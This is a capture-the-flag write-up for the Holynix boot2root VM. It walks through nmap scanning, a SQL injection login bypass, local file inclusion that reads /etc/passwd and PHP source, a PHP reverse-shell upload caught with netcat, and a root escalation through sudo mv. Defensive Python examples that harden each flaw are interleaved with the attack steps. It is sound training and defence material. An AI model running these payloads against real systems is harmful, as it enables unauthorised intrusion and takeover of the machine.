Holynix - Boot2Root Notes

Target VM setup

Set the network adapter to NAT mode and change the MAC address to 00:0C:29:BC:05:DE

(click "Advanced" to edit the MAC address)

Nmap scanning

Host discovery

Scan the /24 once before and once after booting the target and compare; the IP that newly appears is the target: 192.168.9.151

sudo nmap -sn 192.168.9.150/24

TCP open-port scan

sudo nmap -sT --min-rate 10000 -p- 192.168.9.151

Only port 80 is open o.O. That makes things easy.

Still, to be safe, do a UDP scan as well.

UDP open-port scan

sudo nmap -sU --min-rate 10000 -p- 192.168.9.151

Nothing open there either.

TCP service and version scan

sudo nmap -sT -sV -O -p80 192.168.9.151

Ubuntu + Apache

Vuln script scan

sudo nmap --script=vuln -p80 192.168.9.151

The results show two things: the login page has SQL injection, and there is a file upload location.

These two are the focus.

|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_http-trace: TRACE is enabled
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.9.151
|   Found the following possible CSRF vulnerabilities: 
|   
|     Path: http://192.168.9.151:80/?page=login.php
|     Form id: 
|     Form action: /index.php?page=login.php
|   
|     Path: http://192.168.9.151:80/index.php?page=login.php
|     Form id: 
|_    Form action: /index.php?page=login.php
| http-sql-injection: 
|   Possible sqli for queries:
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/index.php?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|     http://192.168.9.151:80/?page=login.php%27%20OR%20sqlspider
|_    http://192.168.9.151:80/index.php?page=login.php%27%20OR%20sqlspider
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum: 
|   /login.php: Possible admin folder
|   /login/: Login page
|   /home/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /img/: Potentially interesting folder
|   /index/: Potentially interesting folder
|   /misc/: Potentially interesting folder
|   /transfer/: Potentially interesting folder 
|_  /upload/: Potentially interesting folder
MAC Address: 00:0C:29:BC:05:DE (VMware)

Getshell

Port 80 - login page

Since only port 80 is open, open it in a browser:

Wow, that's ugly!

The Home link doesn't work; the only thing clickable is the login page:

A quick try of the weak credential admin:admin. Nope, wrong.

But that email address? ltorvalds, the father of Linux. Not sure whether it means anything, but note it down anyway.

image

Now for the SQL injection found earlier:

username=1'#
password=1'

This reveals it: single quotes passed in username are escaped, but single quotes passed in password are not. So the injection point is password; username can be anything.

And the back-end SQL statement:

select * from account where username='$_POST' AND password='$_POST'

Analysis: since username is not injectable and we don't know a valid username, the first half of the AND condition is always false.

Key point: in SQL, AND has higher precedence than OR.

So: select * from table where 0 and 0 or 1 is the same as select * from table where (0 and 0) or 1, which evaluates to 1 (true).

Now the approach is clear: build a universal password and log in~

username=0
password=1' or 1=1 #

Login successful. Our username is alamo.

Port 80 - walking around

Let's click around.

Notice that switching pages goes through the page parameter. Possible file inclusion? Probably not exploitable, since the vuln scan didn't flag it, but let's try.

As expected, it doesn't work.

OK, on to the most anticipated part: Upload!

We build a PHP shell (surely nobody needs to ask why PHP; if you do, go read the URL ten times!), gzip it and upload~

New info learned here: Kali ships with some webshells, under /usr/share/webshells

Copy the PHP reverse shell script we need into the working directory:

cp /usr/share/webshells/php/php-reverse-shell.php ./

Edit it with vim and change the IP to Kali's IP. The port is 1234; no need to change it.

Compress with gzip: gzip -k php-reverse-shell.php. The -k option keeps the original file.

Then upload it: unfortunately, alamo is not allowed to upload files.

So the next goal is to find a higher-privileged user; maybe they are allowed to upload.

Keep clicking around: on the Security page there is another spot that looks like file inclusion.

Capturing with Burp Suite would work here too, but to look cool (?) and to imitate master Hongbi (红笔), I chose F12 to see how the request is sent:

Test it: http://192.168.9.151/index.php?page=ssp.php&text_file_name=ssp/email.txt

OK, that's the parameter. Next, test for file inclusion: http://192.168.9.151/index.php?page=ssp.php&text_file_name=/etc/passwd

root:x:0:0:root:/root:/bin/bash
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash

I trimmed the output to the users with /bin/bash.

Unfortunately, shadow can't be read.

No matter, we have SQL injection; just use the universal password again:

username=0
password=1' or username="etenenbaum" #

# select * from account where username='0' and password='1' or username="etenenbaum" #'
# effectively: select * from account where username="etenenbaum"

Lucky! This user can upload.
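As an added example (not code from this write-up or from the Holynix VM), the two login payloads, the universal one used for alamo and the targeted one just used for etenenbaum, are run in Python against a constructed SQLite stand-in for the account table, beside a parameterised query that refuses them. Assumptions: the table layout and passwords are made up; only the username field is quote-escaped, as observed above (SQLite escapes by doubling the quote, MySQL by a backslash); and MySQL's `#` comment is replaced by `--`, which SQLite understands.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the target's `account` table; names match the page, passwords are made up."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE account (username TEXT, password TEXT, upload INTEGER)")
    con.executemany(
        "INSERT INTO account VALUES (?, ?, ?)",
        [("alamo", "alamo-pass", 0), ("etenenbaum", "eten-pass", 1)],
    )
    return con


def vulnerable_login(con, username, password):
    """Reproduces what the write-up observed: the username's quotes are escaped,
    the password is concatenated into the SQL text unchanged."""
    escaped_user = username.replace("'", "''")
    sql = (
        "SELECT username FROM account "
        f"WHERE username='{escaped_user}' AND password='{password}'"
    )
    return sorted(row[0] for row in con.execute(sql))


def safe_login(con, username, password):
    """Parameterised query: both inputs are bound as values and never parsed as SQL,
    so operator precedence inside the input has nothing to act on."""
    rows = con.execute(
        "SELECT username FROM account WHERE username=? AND password=?",
        (username, password),
    )
    return sorted(row[0] for row in rows)


# The page's payloads, with MySQL's `#` comment swapped for `--` (SQLite has no `#` comment).
UNIVERSAL_PASSWORD = "1' OR 1=1 -- "
TARGETED_PASSWORD = "1' OR username='etenenbaum' -- "

if __name__ == "__main__":
    db = build_db()
    # AND binds first: (username='0' AND password='1') OR 1=1 matches every row
    print(vulnerable_login(db, "0", UNIVERSAL_PASSWORD))
    # same precedence trick, narrowed to one account
    print(vulnerable_login(db, "0", TARGETED_PASSWORD))
    # escaping the username field alone does work for that field ...
    print(vulnerable_login(db, "1' OR 1=1 -- ", "x"))
    # ... but only binding every input closes the hole
    print(safe_login(db, "0", UNIVERSAL_PASSWORD))
```

The third call shows why the write-up's first probe (a quote in username, a quote in password) was the right diagnostic: escaping protects exactly the field it is applied to, and nothing else. The parameterised version makes the question of which field is escaped irrelevant.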

But we don't know the upload path. Use the file inclusion next door to look: http://192.168.9.151/index.php?page=ssp.php&text_file_name=./transfer.php

Hmm, it comes out a bit garbled; read it as base64 instead: http://192.168.9.151/index.php?page=ssp.php&text_file_name=php://filter/read=convert.base64-encode/resource=./transfer.php
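The text_file_name parameter accepted /etc/passwd above and a php://filter wrapper here. As an added example (not the VM's code), this Python validator shows the check such a parameter needs before the value is handed to a file read: it is run over the write-up's own inputs against a constructed web root. The assumption is that legitimate values are .txt files under a single ssp/ directory next to index.php, which is what the working request ssp/email.txt suggests.

```python
import os
import tempfile

TEXT_DIR = "ssp"   # assumption: the only directory text_file_name may read from


def resolve_text_file(param, web_root):
    """Validate a text_file_name value; return an absolute path to read, or None to refuse.
    Rejects NUL bytes, stream wrappers (php://, file://, ...), absolute paths, '..' segments,
    anything that resolves outside web_root/ssp (including symlinks), and non-.txt files."""
    if "\x00" in param or "://" in param:
        return None
    if os.path.isabs(param) or ".." in param.split("/"):
        return None
    base = os.path.realpath(os.path.join(web_root, TEXT_DIR))
    full = os.path.realpath(os.path.join(web_root, param))
    if not full.startswith(base + os.sep):
        return None
    if not full.endswith(".txt") or not os.path.isfile(full):
        return None
    return full


def demo():
    """Run the validator over the inputs seen in the write-up against a constructed web root."""
    with tempfile.TemporaryDirectory() as web_root:
        os.mkdir(os.path.join(web_root, TEXT_DIR))
        with open(os.path.join(web_root, TEXT_DIR, "email.txt"), "w") as fh:
            fh.write("constructed sample text\n")
        cases = [
            "ssp/email.txt",
            "/etc/passwd",
            "ssp/../../../etc/passwd",
            "php://filter/read=convert.base64-encode/resource=./transfer.php",
            "ssp/email.txt\x00.php",
        ]
        return {c: resolve_text_file(c, web_root) is not None for c in cases}


if __name__ == "__main__":
    for value, accepted in demo().items():
        print("accept" if accepted else "refuse", repr(value))
```

Checking the resolved path against the allowed directory is the part that matters: the wrapper and ".." string checks are cheap early exits, but realpath() is what stops a symlink inside ssp/ from pointing at /etc/passwd or at the PHP sources.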

<?php
if ( $auth == 0 ) {
    echo "<center><h2>Content Restricted</h2></center>";
} else {
    if ( $upload == 1 )
    {
        $homedir = "/home/".$logged_in_user. "/";
        $uploaddir = "upload/";
        $target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
        // MIME type as sent by the client; it is not derived from the file contents
        $uploaded_type = $_FILES['uploaded']['type'];
        $command=0;
        $ok=1;

        if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {   $command = 1; }

        if ($ok==0)
        {
            echo "Sorry your file was not uploaded";
            echo "<a href='?index.php?page=upload.php' >Back to upload page</a>";
        } else {
            if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br />";
                echo "The ownership of the uploaded file(s) have been changed accordingly.";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
                if ( $command == 1 )
                {
                    // extracted as root into the user's home; the uploaded file name is interpolated into the shell command
                    exec("sudo tar xzf " .$target. " -C " .$homedir);
                    exec("rm " .$target);
                } else {
                    exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
                }
                exec("/var/apache2/htdocs/update_own");
            } else {
                echo "Sorry, there was a problem uploading your file.<br />";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
            }
        }
    } else { echo "<br /><br /><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>

It extracts with tar xzf, so the archive has to be repacked as a tar.gz.

From the code, the extraction directory is $homedir = "/home/etenenbaum/", so we just visit the corresponding URL:

http://192.168.9.151/~etenenbaum/

Start the listener before clicking: nc -lvnp 1234
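The transfer.php recovered above trusts the client-supplied Content-Type and hands the archive to `sudo tar xzf ... -C $homedir` through a shell. As an added example (not the VM's code and not a drop-in replacement for it), this Python handler shows the defensive counterpart: it checks the gzip magic bytes instead of the declared type, extracts with the tarfile module rather than a shell command, and drops any member that is a link, a device, an absolute path, or would land outside the destination. The archive it runs on is constructed inline.

```python
import io
import os
import tarfile
import tempfile

GZIP_MAGIC = b"\x1f\x8b"


def is_gzip(data):
    """Decide by the bytes, not by the Content-Type header the client chose."""
    return data[:2] == GZIP_MAGIC


def _inside(base, member_name):
    base = os.path.realpath(base)
    target = os.path.realpath(os.path.join(base, member_name))
    return target.startswith(base + os.sep)


def safe_extract(archive_bytes, dest):
    """Extract a .tar.gz into dest without a shell and without letting members escape it.
    Returns (kept, dropped) member names; links and devices are dropped as well."""
    if not is_gzip(archive_bytes):
        raise ValueError("not a gzip stream")
    kept, dropped = [], []
    with tarfile.open(fileobj=io.BytesIO(archive_bytes), mode="r:gz") as tf:
        for member in tf.getmembers():
            if not (member.isfile() or member.isdir()):
                dropped.append(member.name)           # symlinks, hardlinks, devices
            elif os.path.isabs(member.name) or not _inside(dest, member.name):
                dropped.append(member.name)           # absolute path or ../ traversal
            else:
                tf.extract(member, dest, set_attrs=False)
                kept.append(member.name)
    return kept, dropped


def build_sample_archive():
    """Constructed test archive: a benign file, a '..' traversal member and a symlink to /etc/passwd."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tf:
        data = b"constructed sample\n"
        for name in ("notes.txt", "../escape.txt"):
            info = tarfile.TarInfo(name)
            info.size = len(data)
            tf.addfile(info, io.BytesIO(data))
        link = tarfile.TarInfo("shadow-link")
        link.type = tarfile.SYMTYPE
        link.linkname = "/etc/passwd"
        tf.addfile(link)
    return buf.getvalue()


def demo():
    """Extract the sample archive into a throwaway 'home' and report what ended up there."""
    with tempfile.TemporaryDirectory() as home:
        kept, dropped = safe_extract(build_sample_archive(), home)
        return kept, dropped, sorted(os.listdir(home))


if __name__ == "__main__":
    kept, dropped, contents = demo()
    print("kept:", kept)
    print("dropped:", dropped)
    print("home now contains:", contents)
```

Two design points carry over to any upload-and-extract feature: never build a command line from the uploaded file name, and never run the extraction with more privilege than the owner of the destination directory needs. The member-by-member check is what a filtered extraction does; the point of returning the dropped names is that a rejected upload should be logged, not silently ignored.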

Privilege escalation

Basic enumeration

Confirm this is indeed the target.

The Linux kernel is fairly old, so a kernel exploit might work, but that is not the first choice.

First use dpkg to check whether python is installed, so we can upgrade the shell to an interactive one.

Check sudo -l:

Privilege escalation via mv

sudo mv /bin/tar /bin/tar_backup
# back up the original tar

sudo mv /bin/bash /bin/tar
# move /bin/bash to /bin/tar

sudo /bin/tar
# == sudo /bin/bash
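The escalation above works because sudo grants mv, a program that can replace any other file root will later execute. The write-up shows the real sudo -l output only as a screenshot, so this added Python audit check (not part of the write-up) runs over a constructed sudo -l listing and flags rules that grant file-moving binaries, noting whether a password is required. The sample rules and the list of flagged binaries are assumptions for the example.

```python
import re

# Constructed sample of `sudo -l` output; the VM's real listing is not reproduced in the write-up.
SAMPLE_SUDO_L = """\
Matching Defaults entries for etenenbaum on this host:
    env_reset

User etenenbaum may run the following commands on this host:
    (ALL) NOPASSWD: /bin/mv
    (root) /bin/cp
    (root) /usr/bin/less
"""

# Binaries that can overwrite or relocate files root executes (mv and tar both appear in the write-up).
FILE_MOVERS = {"/bin/mv", "/bin/cp", "/bin/tar"}

# "(runas) [TAG: ...] command[, command...]" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


def audit_sudo_rules(text):
    """Return (binary, runas, nopasswd) for every rule granting a file-moving binary."""
    findings = []
    for line in text.splitlines():
        match = RULE_RE.match(line)
        if not match:
            continue
        nopasswd = "NOPASSWD:" in match.group("tags")
        for cmd in match.group("cmds").split(","):
            binary = cmd.strip().split()[0]
            if binary in FILE_MOVERS:
                findings.append((binary, match.group("runas"), nopasswd))
    return findings


if __name__ == "__main__":
    for binary, runas, nopasswd in audit_sudo_rules(SAMPLE_SUDO_L):
        print(f"{binary} runnable as {runas}"
              f"{' without a password' if nopasswd else ''}: can replace files root executes")
```

The fix on the target side is the usual one: sudo rules should name a wrapper script with fixed arguments rather than a general-purpose file utility, and the write-up's own transfer.php (sudo tar, sudo mv from the web server account) is a second instance of the same pattern.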
